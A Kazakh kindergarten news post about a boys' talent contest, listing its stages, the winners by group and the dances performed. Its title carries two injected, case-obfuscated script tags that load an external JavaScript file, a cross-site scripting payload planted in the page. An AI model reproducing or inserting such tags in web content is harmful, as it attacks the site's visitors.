«Жігіт сұлтаны» шығармашылық байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.05.2021

5-6 мамыр күндері «Қарлығаш», «Бәйтерек», «Солнышко» мектепалды даярлық топтарында «Жігіт сұлтаны» атты байқауы болып өтті.

Мақсаты: салт дәстүрлерді насихаттай отырып, нағыз қазақ жігітінің бойындағы қасиеттерімен таныстыру. Әр баланың бойындағы қабілеттерін: ойлау, әр түрлі жағдайлардан шыға білу, өнерін көрсету, тапқырлық, сахна мәдениетін қалыптастыру, дамыту.

Байқау 4 кезеңнен тұрды.

1.«Сәлем – сөздің атасы» таныстыру.
2 «Білімді мыңды жығады». Тапқырлар сайысы.

3. «Талантты болу – тәңірден». Өнер сайысы
4. Үй тапсырмасы. (қазақ ұлттық қол өнер)

Байқауға қатысқан балалар әртістік шеберлік, шығармашылық қабілеттер, сөйлеу мәдениеттерін ортаға салды.

       «Қарлығаш» тобынан 7 бала қатысты. Тәттібайұлы Айдос І- орынға, Найзабеков Ади ІІ- орынға, Қылышбай Нұрхан ІІІ- орынға, Байрақ Санжар ІІІ- орынға, Боранбай Еркебұлан, Ғабдығалым Жандос, Сағдат Диас белсенді қатысқаны үшін диплом, алғыс хат, сыйлықпен марапатталды. Топ қыздары "Қамажай", "Чинури" билерін орындап берді.

«Бәйтерек» тобынан 6 бала қатысты. Ерполат Алихан  І- орынға,Мұрат Баязит ІІ- орынға, Асылхан Ерасыл ІІІ- орынға, Төлеу Айсұлтан ІІІ- орынға, Рашит Рауан, Мырзағали Мансур белсенді қатысқаны үшін  диплом, алғыс хат, сыйлықтармен марапатталды. Топ қыздары "Көк орамал", ұлдар "Сарбаздар" билерін орындады.

         «Солнышко» тобынан 4 бала қатысып өз өнерлерін көрсетті. Скиба Давид І-орынға, Арчаков Федор ІІ- орынға, Гайнутдинов Владимир, Ерқанатұлы Нұржан  ІІІ- орынға диплом, алғыс хат, сыйлықтармен марапатталды. Топ қыздары "Көк орамал" биін орындады. Ұлдар ұлттық ойындарда өз тапқырлықтарын көрсете білді.

       Осындай  өнерге  баулыған «Жұлдыз» балабақшасының музыка  жетекшілері, тәрбиешілер, ата-аналарға ризашылығымызды білдіреміз.

     Біздің бүлдіршіндеріміз жұлдыздай жарқырай берсін!

Просмотров: 354


Пікір қосу



Деректерді қолтаңбаға қосу